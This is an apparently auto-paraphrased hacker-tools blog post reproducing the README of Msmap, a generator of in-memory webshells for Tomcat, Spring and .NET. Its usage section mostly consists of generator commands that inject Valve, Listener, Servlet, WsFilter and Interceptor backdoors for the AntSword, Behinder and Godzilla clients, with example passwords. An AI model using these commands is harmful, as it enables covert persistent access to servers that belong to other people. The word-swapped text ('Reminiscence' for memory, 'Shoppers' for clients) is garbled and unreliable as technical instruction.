Saturday, November 26, 2022
HomeHackerMSMAP - Reminiscence WebShell Generator

MSMAP – Reminiscence WebShell Generator




Msmap is a Reminiscence WebShell Generator. Appropriate with varied Containers, Parts, Encoder, WebShell / Proxy / Killer and Administration Shoppers. 简体中文

The thought behind I, The thought behind II

Operate

Container

*: Default assist for Linux Tomcat 8/9, extra variations will be tailored in response to the superior information.

WebShell / Proxy / Killer

  • WebShell

  • No want for modularity

Proxy: Neo-reGeorg, wsproxy

Killer: java-memshell-scanner, ASP.NET-Memshell-Scanner

Decoder / Decryptor / Hasher

Utilization

[Warning] MUST set a novel password, Choices are case delicate.

Superior

Edit config/setting.py

# Auto Compile
auto_build = True

# Base64 Encode Class File
b64_class = True

# Generate Script File
generate_script = True

# Compiler Absolute Path
java_compiler_path = r"~/jdk1.6.0_04/bin/javac"
dotnet_compiler_path = r"C:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe"

Edit gist/java/container/tomcat/servlet.py

// Servlet Path Sample
personal static String sample = "*.xml";

If an encryption encoder is utilized in WsFilter, the password must be the identical as the trail (eg /passwd)

gist/java/container/jdk/javax.py with lib/servlet-api.jar will be changed relying on the goal container.

pip3 set up pyperclip to assist automated copying to clipboard.

Instance

CMD / SH

Command with Base64 Encoder | Inject Tomcat Valve

python generator.py Java Tomcat Valve Base64 CMD passwd

AntSword

Kind JSP with default Encoder | Inject Tomcat Valve

python generator.py Java Tomcat Valve RAW AntSword passwd

Kind JSP with aes_128_ecb_pkcs7_padding_md5 Encoder | Inject Tomcat Listener

python generator.py Java Tomcat Listener AES128 AntSword passwd

Kind JSP with rc_4_sha256 Encoder | Inject Tomcat Servlet

python generator.py Java Tomcat Servlet RC4 AntSword passwd

Kind JSP with xor_md5 Encoder | AgentFiless Inject HttpServlet

python generator.py Java JDK JavaX XOR AntSword passwd

Kind JSPJS with aes_128_ecb_pkcs7_padding_md5 Encoder | Inject Tomcat WsFilter

python generator.py Java Tomcat WsFilter AES128 JSPJS passwd

Behinder

Kind default_aes | Inject Tomcat Valve

python generator.py Java Tomcat Valve AES128 Behinder rebeyond

Kind default_xor_base64 | Inject Spring Interceptor

python generator.py Java Spring Interceptor XOR Behinder rebeyond

Godzilla

Kind JAVA_AES_BASE64 | Inject Tomcat Valve

python generator.py Java Tomcat Valve AES128 Godzilla superidol

Kind JAVA_AES_BASE64 | AgentFiless Inject HttpServlet

python generator.py Java JDK JavaX AES128 Godzilla superidol

Identified concern

Reference

GodzillaMemoryShellProject

AntSword-JSP-Template

As-Exploits memshell_manage

Behinder | wsMemShell | ysomap



RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments